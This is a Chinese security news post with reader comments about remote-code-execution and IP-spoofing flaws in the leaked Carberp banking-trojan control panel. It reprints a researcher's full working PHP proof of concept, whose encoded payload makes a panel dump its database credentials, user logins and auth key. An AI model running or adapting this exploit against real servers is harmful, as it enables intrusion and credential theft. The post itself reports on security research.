上周,价值连城的银行盗号软件Carberp源代码遭泄露,高达1.8个G的数据,全球同行都在纷纷研究它的恶意代码。然而,一位法国的安全研究人员Steven K发现了独特的东西。他发现了Carberp自身的控制台存在很多安全漏洞。其中包括IP地址欺骗和远程代码控制。

研究人员发现了Carberp’s Panel中“data”这个变量存在远程代码执行漏洞,如下图所示:

Carberp源代码泄露后续——黑掉黑客

IP地址欺骗漏洞:

Carberp源代码泄露后续——黑掉黑客

同时他还写了PoC: 

Carberp RCE
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
/*
Xyl2k!
Greeting to Xartrick for fixing the payload (:
*/
if(!isset($_POST['urlz'])) ;
else 
if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
{
echo "<font color='red'>URL is not valid</font>";
}
else
{
{
$data = array(
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q=');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$contents = curl_exec($ch);
curl_close($ch);
if (preg_match("#-#", $contents))
{ echo "<pre>" . $contents . "</pre>"; }
else
{ echo "<font color='red'>Not vulnerable</font>"; }
}
}
?></td>
</tr>
</table>

他已经成功利用漏洞攻陷了数据的用户名、密码、Auth Key。如下图所示:

Carberp源代码泄露后续——黑掉黑客

换句话说,可以利用这个漏洞去“坐享其成”,把使用Carberp的黑客黑掉,摘取黑客的革命成果。

法国研究者分析链接:

http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html

相关阅读:

价值50000美元的银行恶意软件源码 – Carberp

无节操讨论:

米歇尔.奥巴马 2013-07-02 1楼

第一张图 和 第二张图 是什么编程语言?? 表示从来没见过呀…求科普~~

hume 2013-07-02

@米歇尔.奥巴马 不是明显的PHP吗?

刘德华 2013-07-02

@hume 你读反了,应该倒着读,php,这样才对.

helen 2013-07-02

@米歇尔.奥巴马 拍黄片都不知道 还搞什么代码审计

EAGLE 2013-07-02 2楼

特征是啥捏

rookit (1级) 2013-07-02 3楼

卧槽

猥琐大叔 2013-07-02 4楼

好明显的后门啊

黑黑的白猫 (1级) 2013-07-02 5楼

擦,典型的黑吃黑啊~~~

落叶纷飞 (1级) 00day.cn,打站尸,脚本猪,WEB安全攻城尸 2013-07-02 6楼

系甘噶啦,人地又5系写WEB出身噶,遍地漏洞好正常啦

马化腾 2013-07-02 7楼

这明显是作者放出之前的后门好不好算啥漏洞

helen 2013-07-03 8楼

我去泥码的,虽然后门不是我发现,但我想说这后门也太明显了吧?握曹作者写出这么牛B的木马居然连写个隐蔽点的后门都写不好,我表示深深的怀疑!神马Carberp有白金牛B?有GH0ST和灰鸽子牛B?你们都OUT啦!

Fck4th (1级) 2013-07-07

@helen 你亮了~